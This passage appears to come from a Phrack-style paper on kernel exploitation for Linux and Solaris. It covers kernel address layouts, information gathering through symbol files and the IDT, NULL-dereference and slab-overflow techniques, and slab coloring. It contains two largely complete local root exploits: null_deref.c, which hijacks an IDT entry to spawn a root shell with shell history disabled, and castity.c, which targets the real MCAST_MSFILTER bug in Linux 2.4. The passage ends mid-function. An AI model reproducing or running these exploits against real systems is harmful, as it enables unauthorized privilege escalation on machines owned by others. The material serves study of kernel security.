depending on the amount of physical memory (check
usr/src/uts/i86pc/os/startup.c inside Opensolaris sources).
This fluctuation turned out to be necessary to avoid as much as possible
virtual memory ranges wasting and, at the same time, avoid pressure over
the space reserved to the kernel.  

The only limitation to kernel (and processes) virtual space on systems
implementing an userland/kerneland separated address space is given by the
architecture (UltraSPARC I and II can reference only 44bit of the whole
64bit addressable space. This VA-hole is placed among 0x0000080000000000

This memory model makes explotation indeed harder, because we can't
directly dereference the userspace. The previously cited NULL pointer
dereferences are pretty much un-exploitable.
Moreover, we can't rely on "valid" userland addresses as a place to store
our shellcode (or any other kernel emulation data), neither we can "return
to userspace". 

We won't go more in details here with a teorical description of the
architectures (you can check the reference manuals at [1], [2] and [3])
since we've preferred to couple the analysis of the architectural and
operating systems internal aspects relevant to explotation with the
effective exploiting codes presentation.

---[ 1.2 - Dummy device driver and real vulnerabilities 

As we said in the introduction, we're going to present a couple of real
working exploit, hoping to give a better insight into the whole kernel
explotation process. 
We've written exploit for : 

-  MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
   overflow exploiting

-  sendmsg vulnerability [5], used to demonstrate an effective race
   condition (and a stack overflow on AMD64) 

-  madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real
   remote exploit for the linux kernel. That exploit was already released
   at [22] before the exit of this paper (which has a more detailed
   discussion of it and another 'dummy based' exploit for a more complex

Moreover, we've written a dummy device driver (for Linux and Solaris) to
demonstrate with examples the techniques presented. 
A more complex remote exploit (as previously mentioned) and an exploit 
capable to circumvent Linux with PaX/KERNEXEC (and userspace/kernelspace
separation) will be presented too.

---[ 1.3 - Notes about information gathering 

Remember when we were talking about information gathering ? Nearly every
operating systems 'exports' to userland information useful for developing
and debugging. Both Linux and Solaris (we're not taking in account now
'security patches') expose readable by the user the list and addresses of
their exported symbols (symbols that module writer can reference) :
/proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and /dev/ksyms on
Solaris (the first two are text files, the last one is an ELF with SYMTAB
Those files provide useful information about what is compiled in inside
the kernel and at what addresses are some functions and structs, addresses
that we can gather at runtime and use to increase the reliability of our

But theese information could be missing on some environment, the /proc
filesystem could be un-mounted or the kernel compiled (along with some
security switch/patch) to not export them. 
This is more a Linux problem than a Solaris one, nowadays. Solaris exports
way more information than Linux (probably to aid in debugging without
having the sources) to the userland. Every module is shown with its
loading address by 'modinfo', the proc interface exports the address of
the kernel 'proc_t' struct to the userland (giving a crucial entrypoint,
as we will see, for the explotation on UltraSPARC systems) and the 'kstat'
utility lets us investigate on many kernel parameters. 

In absence of /proc (and /sys, on Linux 2.6) there's another place we can
gather information from, the kernel image on the filesystem. 
There are actually two possible favourable situations :

  - the image is somewhere on the filesystem and it's readable, which is
    the default for many Linux distributions and for Solaris

  - the target host is running a default kernel image, both from
    installation or taken from repository. In that situation is just a
    matter of recreating the same image on our system and infere from it. 
    This should be always possible on Solaris, given the patchlevel (taken
    from 'uname' and/or 'showrev -p'). 
    Things could change if OpenSolaris takes place, we'll see. 

The presence of the image (or the possibility of knowing it) is crucial
for the KERN_EXEC/separated userspace/kernelspace environment explotation
presented at the end of the paper. 

Given we don't have exported information and the careful administrator has
removed running kernel images (and, logically, in absence of kernel memory
leaks ;)) we've one last resource that can help in explotation : the
Let's take the x86 arch, a process running at ring3 may query the logical
address and offset/attribute of processor tables GDT,LDT,IDT,TSS :

- through 'sgdt' we get the base address and max offset of the GDT 
- through 'sldt' we can get the GDT entry index of current LDT 
- through 'sidt' we can get the base address and max offset of IDT 
- through 'str'  we can get the GDT entry index of the current TSS 

The best choice (not the only one possible) in that case is the IDT. The
possibility to change just a single byte in a controlled place of it 
leads to a fully working reliable exploit [*]. 

[*] The idea here is to modify the MSB of the base_address of an IDT entry
    and so "hijack" the exception handler. Logically we need a controlled
    byte overwriting or a partially controlled one with byte value below
    the 'kernelbase' value, so that we can make it point into the userland
    portion. We won't go in deeper details about the IDT
    layout/implementation here, you can find them inside processor manuals
    [1] and kad's phrack59 article "Handling the Interrupt Descriptor
    Table" [6].
    The NULL pointer dereference exploit presented for Linux implements
    this technique.  

As important as the information gathering step is the recovery step, which
aims to leave the kernel in a consistent state. This step is usually
performed inside the shellcode itself or just after the exploit has
(successfully) taken place, by using /dev/kmem or a loadable module (if
This step is logically exploit-dependant, so we will just explain it along
with the examples (making a categorization would be pointless). 

------[ 2 - Kernel vulnerabilities and bugs 

We start now with an excursus over the various typologies of kernel
vulnerabilities. The kernel is a big and complex beast, so even if we're
going to track down some "common" scenarios, there are a lot of more
possible "logical bugs" that can lead to a system compromise.

We will cover stack based, "heap" (better, slab) based and NULL/userspace
dereference vulnerabilities. As an example of a "logical bug" a whole
chapter is dedicated to race condition and techniques to force a kernel
path to sleep/reschedule (along with a real exploit for the sendmsg [4]
vulnerability on AMD64). 

We won't cover in this paper the range of vulnerabilities related to
virtual memory logical errors, since those have been already extensively
described and cleverly exploited, on Linux, by iSEC [7] people.
Moreover, it's nearly useless, in our opinion, to create a "crafted" 
demonstrative vulnerable code for logical bugs and we weren't aware of any
_public_ vuln of this kind on Solaris. If you are, feel free to submit it,
we'll be happy to work over ;). 

---[ 2.1 - NULL/userspace dereference vulnerabilities 

This kind of vulnerability derives from the using of a pointer
not-initialized (generally having a NULL value) or trashed, so that it
points inside the userspace part of the virtual memory address space.
The normal behaviour of an operating system in such a situation is an oops
or a crash (depending on the degree of severity of the dereference) while
attempting to access un-mapped memory. 

But we can, obviously, mmap that memory range and let the kernel find
"valid" malicius data. That's more than enough to gain root priviledges. 
We can delineate two possible scenarios :

  - instruction pointer modification (direct call/jmp dereference,
    called function pointers inside a struct, etc)

  - "controlled" write on kernelspace 

The first kind of vulnerability is really trivial to exploit, it's just a
matter of mmapping the referenced page and put our shellcode there.
If the dereferenced address is a struct with inside a function pointer (or
a chain of struct with somewhere a function pointer), it is just a matter
of emulating in userspace those struct, make point the function pointer
to our shellcode and let/force the kernel path to call it.

We won't show an example of this kind of vulnerability since this is the
"last stage" of any more complex exploit (as we will see, we'll be always
trying, when possible, to jump to userspace).  

The second kind of vulnerability is a little more complex, since we can't
directly modify the instruction pointer, but we've the possibility to
write anywhere in kernel memory (with controlled or uncontrolled data). 

Let's get a look to that snipped of code, taken from our Linux dummy
device driver :

< stuff/drivers/linux/dummy.h >


struct user_data_ioctl
  int size;  
  char *buffer;

< / >

< stuff/drivers/linux/dummy.c >

static int alloc_info(unsigned long sub_cmd)
  struct user_data_ioctl user_info;
  struct info_user *info;
  struct user_perm *perm;

                    (void __user*)sub_cmd,
                    sizeof(struct user_data_ioctl)))
    return -EFAULT;

  if(user_info.size > MAX_STORE_SIZE)  [1]
    return -ENOENT;

  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
    return -ENOMEM;

  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
    return -ENOMEM;

  info->timestamp = 0;//sched_clock();
  info->max_size  = user_info.size;
  info->data = kmalloc(user_info.size, GFP_KERNEL); [2]
  /* unchecked alloc */

  perm->uid = current->uid;
  info->data->perm = perm; [3]

  glob_info = info;


static int store_info(unsigned long sub_cmd)


  glob_info->data->perm->uid = current->uid; [4]


< / > 

Due to the integer signedness issue at [1], we can pass a huge value
to the kmalloc at [2], making it fail (and so return NULL). 
The lack of checking at that point leaves a NULL value in the info->data
pointer, which is later used, at [3] and also inside store_info at [4] to
save the current uid value. 

What we have to do to exploit such a code is simply mmap the zero page
(0x00000000 - NULL) at userspace, make the kmalloc fail by passing a
negative value and then prepare a 'fake' data struct in the previously
mmapped area, providing a working pointers for 'perm' and thus being able
to write our 'uid' anywhere in memory.  

At that point we have many ways to exploit the vulnerable code (exploiting
while being able to write anywhere some arbitrary or, in that case,
partially controlled data is indeed limited only by imagination), but it's
better to find a "working everywhere" way.

As we said above, we're going to use the IDT and overwrite one of its
entries (more precisely a Trap Gate, so that we're able to hijack an
exception handler and redirect the code-flow towards userspace).
Each IDT entry is 64-bit (8-bytes) long and we want to overflow the
'base_offset' value of it, to be able to modify the MSB of the exception
handler routine address and thus redirect it below PAGE_OFFSET
(0xc0000000) value. 
Since the higher 16 bits are in the 7th and 8th byte of the IDT entry,
that one is our target, but we're are writing at [4] 4 bytes for the 'uid'
value, so we're going to trash the next entry. It is better to use two
adiacent 'seldomly used' entries (in case, for some strange reason,
something went bad) and we have decided to use the 4th and 5th entries :
#OF (Overflow Exception) and #BR (BOUND Range Exeeded Exeption).

At that point we don't control completely the return address, but that's
not a big problem, since we can mmap a large region of the userspace and
fill it with NOPs, to prepare a comfortable and safe landing point for our
exploit. The last thing we have to do is to restore, once we get the
control flow at userspace, the original IDT entries, hardcoding the values
inside the shellcode stub or using an lkm or /dev/kmem patching code. 

At that point our exploit is ready to be launched for our first

As a last (indeed obvious) note, NULL dereference vulnerabilities are 
only exploitable on 'combined userspace and kernelspace' memory model
operating systems.

---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c  

< stuff/expl/null_deref.c >

#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE          "/dev/dummy"
#define NOP             0x90
#define STACK_SIZE      8192

//#define STACK_SIZE 4096

#define PAGE_SIZE       0x1000
#define PAGE_OFFSET     12
#define PAGE_MASK       ~(PAGE_SIZE -1)

#define ANTANI          "antani"

uint32_t        bound_check[2]={0x00,0x00};
extern void     do_it();
uid_t           UID;

void do_bound_check()
        asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : "a"(0xFF));

/* simple shell spown */
void get_root()
  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", "BASH_HISTORY=/dev/null",
                   "HISTORY=/dev/null", "history=/dev/null",
                   "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };

  execve("/bin/sh", argv, envp);
  fprintf(stderr, "[**] Execve failed\n");

/* this function is called by fake exception handler: take 0 uid and restore trashed entry */
void give_priv_and_restore(unsigned int thread)
  int i;
  unsigned short addr;
  unsigned int* p = (unsigned int*)thread;

  /* simple trick */
  for(i=0; i < 0x100; i++)
  if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) && (p[i+3] == UID) )
    p[i] = 0, p[i+1] = 0;


#define CODE_SIZE       0x1e

void dummy(void)
    "addl $6, (%%esp);"  // after bound exception EIP points again to the bound instruction
    "movl %%esp, %%eax;"
    "andl %0, %%eax;"
    "movl (%%eax), %%eax;"
    "add $100, %%eax;"
    "pushl %%eax;"
    "movl $give_priv_and_restore, %%ebx;"
    "call *%%ebx;"
    "popl %%eax;"
   :: "i"( ~(STACK_SIZE -1))

struct idt_struct
  uint16_t limit;
  uint32_t base;
} __attribute__((packed));

static char *allocate_frame_chunk(unsigned int base_addr,
                                  unsigned int size,
                                  void* code_addr)
  unsigned int round_addr = base_addr & PAGE_MASK;
  unsigned int diff       = base_addr - round_addr;
  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & PAGE_MASK;

  char *map_addr = mmap((void*)round_addr,
  if(map_addr == MAP_FAILED)
    return MAP_FAILED;

    memset(map_addr, NOP, len);
    memcpy(map_addr, code_addr, size);
    memset(map_addr, 0x00, len);

  return (char*)base_addr;

inline unsigned int *get_zero_page(unsigned int size)
  return (unsigned int*)allocate_frame_chunk(0x00000000, size, NULL);

#define BOUND_ENTRY 5
unsigned int get_BOUND_address()
        struct idt_struct idt;
        asm volatile("sidt %0\t\n" : "=m"(idt));
        return idt.base + (8*BOUND_ENTRY);

unsigned int prepare_jump_code()
  UID = getuid();       /* set global uid */
  unsigned int base_address = ((UID & 0x0000FF00) << 16) + ((UID & 0xFF) << 16);
  printf("Using base address of: 0x%08x-0x%08x\n", base_address, base_address + 0x20000 -1);
  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
  if(addr == MAP_FAILED)
    perror("unable to mmap jump code");

  memset((void*)base_address, NOP, 0x20000);
  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);

  return base_address;

int main(int argc, char *argv[])
  struct user_data_ioctl user_ioctl;
  unsigned int *zero_page, *jump_pages, save_ptr;

  zero_page = get_zero_page(PAGE_SIZE);
  if(zero_page == MAP_FAILED)
    perror("mmap: unable to map zero page");

  jump_pages = (unsigned int*)prepare_jump_code();

  int ret, fd = open(DEVICE,  O_RDONLY), alloc_size;

  if(argc > 1)
    alloc_size = atoi(argv[1]);
   alloc_size  = PAGE_SIZE-8;

  if(fd < 0)
    perror("open: dummy device");

  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
  user_ioctl.size = alloc_size;

  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
  if(ret < 0)
    perror("ioctl KERN_IOCTL_ALLOC_INFO");

  /* save old struct ptr stored by kernel in the first word */
  save_ptr = *zero_page;

  /* compute the new ptr inside the IDT table between BOUND and INVALIDOP exception */
  printf("IDT bound: %x\n", get_BOUND_address());
  *zero_page = get_BOUND_address() + 6;


  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);


  /* restore trashed ptr */
  *zero_page = save_ptr;

  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
  if(ret < 0)
    perror("ioctl KERN_IOCTL_FREE_INFO");


  return 0;

< / > 

---[ 2.2 - The Slab Allocator 

The main purpose of a slab allocator is to fasten up the
allocation/deallocation of heavily used small 'objects' and to reduce the
fragmentation that would derive from using the page-based one.
Both Solaris and Linux implement a slab memory allocator which derives
from the one described by Bonwick [8] in 1994 and implemented in Solaris

The idea behind is, basically : objects of the same type are grouped
together inside a cache in their constructed form. The cache is divided in
'slabs', consisting of one or more contiguos page frames.   
Everytime the Operating Systems needs more objects, new page frames (and
thus new 'slabs') are allocated and the object inside are constructed.
Whenever a caller needs one of this objects, it gets returned an already
prepared one, that it has only to fill with valid data. When an object is
'freed', it doesn't get destructed, but simply returned to its slab and
marked as available. 

Caches are created for the most used objects/structs inside the operating
system, for example those representing inodes, virtual memory areas, etc. 
General-purpose caches, suitables for small memory allocations, are 
created too, one for each power of two, so that internal fragmentation is
guaranted to be at least below 50%. 
The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly
those latter described caches. Since it is up to the caller to 'clean' the
object returned from a slab (which could contain 'dead' data), wrapper
functions that return zeroed memory are usually provided too (kzalloc(),

An important (from an exploiting perspective) 'feature' of the slab
allocator is the 'bufctl', which is meaningful only inside a free object,
and is used to indicate the 'next free object'.
A list of free object that behaves just like a LIFO is thus created, and
we'll see in a short that it is crucial for reliable explotation. 

To each slab is associated a controlling struct (kmem_slab_t on Solaris,
slab_t on Linux) which is stored inside the slab (at the start, on Linux,
at the end, on Solaris) if the object size is below a given limit (1/8 of
the page), or outside it.
Since there's a 'cache' per 'object type', it's not guaranted at all that
those 'objects' will stay exactly in a page boundary inside the slab. That
'free' space (space not belonging to any object, nor to the slab
controlling struct) is used to 'color' the slab, respecting the object
alignment (if 'free' < 'alignment' no coloring takes place).

The first object is thus saved at a 'different offset' inside the slab,
given from 'color value' * 'alignment', (and, consequently, the same
happens to all the subsequent objects), so that object of the same size in
different slabs will less likely end up in the same hardware cache lines. 

We won't go more in details about the Slab Allocator here, since it is
well and extensively explained in many other places, most notably at [9],
[10], and [11], and we move towards effective explotation. 
Some more implementation details will be given, thou, along with the
exploiting techniques explanation.

---[ 2.2.1 - Slab overflow vulnerabilities  

NOTE: as we said before, Solaris and Linux have two different function to
alloc from the general purpose caches, kmem_alloc() and kmalloc(). That
two functions behave basically in the same manner, so, from now on we'll
just use 'kmalloc' and 'kmalloc'ed memory' in the discussion, referring
thou to both the operating systems implementation. 

A slab overflow is simply the writing past the buffer boundaries of a
kmalloc'ed object. The result of this overflow can be :

- overwriting an adiacent in-slab object. 
- overwriting a page next to the slab one, in the case we're overwriting
  past the last object.
- overwriting the control structure associated with the slab (Solaris
The first case is the one we're going to show an exploit for. The main
idea on such a situation is to fill the slabs (we can track the slab
status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' on
Solaris) so that a new one is necessary.
We do that to be sure that we'll have a 'controlled' bufctl : since the
whole slabs were full, we got a new page, along with a 'fresh' bufctl 
pointer starting from the first object.

At that point we alloc two objects, free the first one and trigger the
vulnerable code : it will request a new object and overwrite right into
the previously allocated second one. If a pointer inside this second
object is stored and then used (after the overflow) it is under our
This approach is very reliable.  

The second case is more complex, since we haven't an object with a pointer
or any modifiable data value of interest to overwrite into. We still have
one chance, thou, using the page frame allocator. 
We start eating a lot of memory requesting the kind of 'page' we want to
overflow into (for example, tons of filedescriptor), putting the memory
under pressure. At that point we start freeing a couple of them, so that
the total amount counts for a page.  
At that point we start filling the slab so that a new page is requested.
If we've been lucky the new page is going to be just before one of the
previously allocated ones and we've now the chance to overwrite it. 

The main point affecting the reliability of such an exploit is : 

  - it's not trivial to 'isolate' a given struct/data to mass alloc at the
    first step, without having also other kernel structs/data growing
    together with.
    An example will clarify : to allocate tons of file descriptor we need
    to create a large amount of threads. That translates in the allocation
    of all the relative control structs which could end up placed right
    after our overflowing buffer.

The third case is possible only on Solaris, and only on slabs which keep
objects smaller than 'page_size >> 3'. Since Solaris keeps the kmem_slab
struct at the end of the slab we can use the overflow of the last object
to overwrite data inside it. 

In the latter two 'typology' of exploit presented we have to take in
account slab coloring. Both the operating systems store the 'next color
offset' inside the cache descriptor, and update it at every slab
allocation (let's see an example from OpenSolaris sources) :

< usr/src/uts/common/os/kmem.c >

static kmem_slab_t *
kmem_slab_create(kmem_cache_t *cp, int kmflag)
        size_t color, chunks;
        color = cp->cache_color + cp->cache_align;
        if (color > cp->cache_maxcolor)
                color = cp->cache_mincolor;
        cp->cache_color = color;

< / >

'mincolor' and 'maxcolor' are calculated at cache creation and represent
the boundaries of available caching :

# uname -a
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
# kstat -n file_cache | grep slab
        slab_alloc                      280
        slab_create                     2
        slab_destroy                    0
        slab_free                       0
        slab_size                       8192
# kstat -n file_cache | grep align
        align                           8
# kstat -n file_cache | grep buf_size
        buf_size                        56
# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::sizeof kmem_slab_t
sizeof (kmem_slab_t) = 0x38
> ::kmem_cache ! grep file_cache
00000300005fed88 file_cache                0000 000000       56      290
> 00000300005fed88::print kmem_cache_t cache_mincolor
cache_mincolor = 0
> 00000300005fed88::print kmem_cache_t cache_maxcolor
cache_maxcolor = 0x10
> 00000300005fed88::print kmem_cache_t cache_color
cache_color = 0x10
> ::quit

As you can see, from kstat we know that 2 slabs have been created and we
know the alignment, which is 8. Object size is 56 bytes and the size of
the in-slab control struct is 56, too. Each slab is 8192, which, modulo 56
gives out exactly 16, which is the maxcolor value (the color range is thus
0 - 16, which leads to three possible coloring with an alignment of 8). 

Based on the previous snippet of code, we know that first allocation had
a coloring of 8 ( mincolor == 0 + align == 8 ), the second one of 16
(which is the value still recorded inside the kmem_cache_t). 
If we were for exhausting this slab and get a new one we would know for
sure that the coloring would be 0. 

Linux uses a similar 'circolar' coloring too, just look forward for
'kmem_cache_t'->colour_next setting and incrementation. 

Both the operating systems don't decrement the color value upon freeing of
a slab, so that has to be taken in account too (easy to do on Solaris,
since slab_create is the maximum number of slabs created).

---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER 

Given the technical basis to understand and exploit a slab overflow, it's
time for a practical example. 
We're presenting here an exploit for the MCAST_MSFILTER [4] vulnerability
found by iSEC people :

< linux-2.4.24/net/ipv4/ip_sockglue.c >

        struct sockaddr_in *psin;
        struct ip_msfilter *msf = 0;
        struct group_filter *gsf = 0;
        int msize, i, ifindex;

        if (optlen < GROUP_FILTER_SIZE(0))
                goto e_inval;
        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2]
        if (gsf == 0) {
                err = -ENOBUFS;
        err = -EFAULT;
        if (copy_from_user(gsf, optval, optlen)) {  [3]
                goto mc_msf_out;
        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4]
                err = EINVAL;
                goto mc_msf_out;
        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);  [1]
        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7]
        if (msf == 0) {
                err = -ENOBUFS;
                goto mc_msf_out;

        msf->imsf_multiaddr = psin->sin_addr.s_addr;
        msf->imsf_interface = 0;
        msf->imsf_fmode = gsf->gf_fmode;
        msf->imsf_numsrc = gsf->gf_numsrc;
        err = -EADDRNOTAVAIL;
        for (i=0; i<gsf->gf_numsrc; ++i) {  [5]
                psin = (struct sockaddr_in *)&gsf->gf_slist[i];

                if (psin->sin_family != AF_INET) [8]
                        goto mc_msf_out;
                msf->imsf_slist[i] = psin->sin_addr.s_addr; [6]

                        if (msf)
                        if (gsf)


< / >

< linux-2.4.24/include/linux/in.h >

#define IP_MSFILTER_SIZE(numsrc) \    [1]
        (sizeof(struct ip_msfilter) - sizeof(__u32) \
        + (numsrc) * sizeof(__u32))


#define GROUP_FILTER_SIZE(numsrc) \   [4]
        (sizeof(struct group_filter) - sizeof(struct
__kernel_sockaddr_storage) \
        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))

< / >

The vulnerability consist of an integer overflow at [1], since we control
the gsf struct as you can see from [2] and [3].
The check at [4] proved to be, initially, a problem, which was resolved
thanks to the slab property of not cleaning objects on free (back on that
in a short).
The for loop at [5] is where we effectively do the overflow, by writing,
at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct over the
previously allocated msf [7] struct (kmalloc'ed with bad calculated 
'msize' value). 
This for loop is a godsend, because thanks to the check at [8] we are able
to avoid the classical problem with integer overflow derived bugs (that is
writing _a lot_ after the buffer due to the usually huge value used to
trigger the overflow) and exit cleanly through mc_msf_out. 

As explained before, while describing the 'first explotation approach', we
need to find some object/data that gets kmalloc'ed in the same slab and 
which has inside a pointer or some crucial-value that would let us change
the execution flow.

We found a solution with the 'struct shmid_kernel' :

< linux-2.4.24/ipc/shm.c >

struct shmid_kernel /* private to the kernel */
        struct kern_ipc_perm    shm_perm;
        struct file *           shm_file;
        int                     id;


asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
        struct shmid_kernel *shp;
        int err, id = 0;

        if (key == IPC_PRIVATE) {
                err = newseg(key, shmflg, size);

static int newseg (key_t key, int shmflg, size_t size)
        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USER);

As you see, struct shmid_kernel is 64 bytes long and gets allocated using
kmalloc (size-64) generic cache [ we can alloc as many as we want (up to
fill the slab) using subsequent 'shmget' calls ].
Inside it there is a struct file pointer, that we could make point, thanks
to the overflow, to the userland, where we will emulate all the necessary
structs to reach a function pointer dereference (that's exactly what the
exploit does). 

Now it is time to force the msize value into being > 32 and =< 64, to make
it being alloc'ed inside the same (size-64) generic cache. 
'Good' values for gsf->gf_numsrc range from 0x40000005 to 0x4000000c. 
That raises another problem : since we're able to write 4 bytes for
every __kernel_sockaddr_storage present in the gsf struct we need a pretty
large one to reach the 'shm_file' pointer, and so we need to pass a large
'optlen' value.
The 0x40000005 - 0x4000000c range, thou, makes the GROUP_FILTER_SIZE() macro
used at [4] evaluate to a positive and small value, which isn't large
enough to reach the 'shm_file' pointer. 

We solved that problem thanks to the fact that, once an object is free'd,
its 'memory contents' are not zero'ed (or cleaned in any way). 
Since the copy_from_user at [3] happens _before_ the check at [4], we were
able to create a sequence of 1024-sized objects by repeatedly issuing a
failing (at [4]) 'setsockopt', thus obtaining a large-enough one. 

Hoping to make it clearer let's sum up the steps :        

  - fill the 1024 slabs so that at next allocation a fresh one is returned 
  - alloc the first object of the new 1024-slab.
  - use as many 'failing' setsockopt as needed to copy values inside
    objects 2 and 3 [and 4, if needed, not the usual case thou] 
  - free the first object 
  - use a smaller (but still 1024-slab allocation driving) value for
    optlen that would pass the check at [4] 

At that point the gsf pointer points to the first object inside our
freshly created slab. Objects 2 and 3 haven't been re-used yet, so still
contains our data. Since the objects inside the slab are adiacent we have
a de-facto larger (and large enough) gsf struct to reach the 'shm_file'

Last note, to reliably fill the slabs we check /proc/slabinfo. 
The exploit, called castity.c, was written when the advisory went out, and
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than 
enough for 2.6.* ones ;) )

Exploit follows, just without the initial header, since the approach has
been already extensively explained above.
< stuff/expl/linux/castity.c >

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>

#define __u32           unsigned int
#define MCAST_MSFILTER  48
#define SOL_IP          0
#define SIZE            4096
#define R_FILE          "/etc/passwd"    // Set it to whatever file you
can read. It's just for 1024 filling.

struct in_addr {
   unsigned int   s_addr;

#define __SOCK_SIZE__   16

struct sockaddr_in {
  unsigned short        sin_family;     /* Address family               */
  unsigned short int    sin_port;       /* Port number                  */
  struct in_addr        sin_addr;       /* Internet address             */

  /* Pad to size of `struct sockaddr'. */
  unsigned char         __pad[__SOCK_SIZE__ - sizeof(short int) -
                        sizeof(unsigned short int) - sizeof(struct

struct group_filter
        __u32                   gf_interface;   /* interface index */
        struct sockaddr_storage gf_group;       /* multicast address */
        __u32                   gf_fmode;       /* filter mode */
        __u32                   gf_numsrc;      /* number of sources */
        struct sockaddr_storage gf_slist[1];    /* interface index */

struct  damn_inode      {
        void            *a, *b;
        void            *c, *d;
        void            *e, *f;
        void            *i, *l;
        unsigned long   size[40];  // Yes, somewhere here :-)
} le;

struct  dentry_suck     {
        unsigned int    count, flags;
        void            *inode;
        void            *dd;
} fucking = { 0xbad, 0xbad, &le, NULL };

struct  fops_rox        {
        void            *a, *b, *c, *d, *e, *f, *g;
        void            *mmap;
        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
        void            *get_unmapped_area;
} chien;

struct  file_fuck       {
        void            *prev, *next;
        void            *dentry;
        void            *mnt;
        void            *fop;
} gagne = { NULL, NULL, &fucking, NULL, &chien };

static char     stack[16384];

int             gotsig = 0,
                fillup_1024 = 0,
                fillup_64 = 0,
                uid, gid;

int             *pid, *shmid;

static void sigusr(int b)
        gotsig = 1;

void fatal (char *str)
        fprintf(stderr, "[-] %s\n", str);

#define BUFSIZE 256

int calculate_slaboff(char *name)
        FILE *fp;
        char slab[BUFSIZE], line[BUFSIZE];
        int ret;
        /* UP case */
        int active_obj, total;

        bzero(slab, BUFSIZE);
        bzero(line, BUFSIZE);

        fp = fopen("/proc/slabinfo", "r");
        if ( fp == NULL )
                fatal("error opening /proc for slabinfo");

        fgets(slab, sizeof(slab) - 1, fp);
        do {
                ret = 0;
                if (!fgets(line, sizeof(line) - 1, fp))
                ret = sscanf(line, "%s %u %u", slab, &active_obj, &total);
        } while (strcmp(slab, name));


        return ret == 3 ? total - active_obj : -1;


int populate_1024_slab()
        int fd[252];
        int i;

        signal(SIGUSR1, sigusr);

        for ( i = 0; i < 252 ; i++)
                fd[i] = open(R_FILE, O_RDONLY);

        while (!gotsig)
        gotsig = 0;

        for ( i = 0; i < 252; i++)


int kernel_code()
        int i, c;
        int *v;

        __asm__("movl   %%esp, %0" : : "m" (c));

        c &= 0xffffe000;
         v = (void *) c;

        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
                if (v[i] == uid && v[i+1] == uid) {
                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                if (v[i] == gid) {
                        v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                        return -1;

        return -1;

void    prepare_evil_file ()
        int i = 0;

        chien.mmap = &kernel_code ;   // just to pass do_mmap_pgoff check
        chien.get_unmapped_area = &kernel_code;

         * First time i run the exploit i was using a precise offset for
         * size, and i calculated it _wrong_. Since then my lazyness took
	 * over and i use that ""very clean"" *g* approach.
         * Why i'm telling you ? It's 3 a.m., i don't find any better than
         * writing blubbish comments

        for ( i = 0; i < 40; i++)
                le.size[i] = SIZE;


#define SEQ_MULTIPLIER  32768

void    prepare_evil_gf ( struct group_filter *gf, int id )
        int                     filling_space = 64 - 4 * sizeof(int);
        int                     i = 0;
        struct sockaddr_in      *sin;

        filling_space /= 4;

        for ( i = 0; i < filling_space; i++ )
              sin = (struct sockaddr_in *)&gf->gf_slist[i];
              sin->sin_family = AF_INET;
              sin->sin_addr.s_addr = 0x41414141;

        /* Emulation of struct kern_ipc_perm */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = IPC_PRIVATE;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = -1;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;

        /* evil struct file address */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = (unsigned long)&gagne;

        /* that will stop mcast loop */

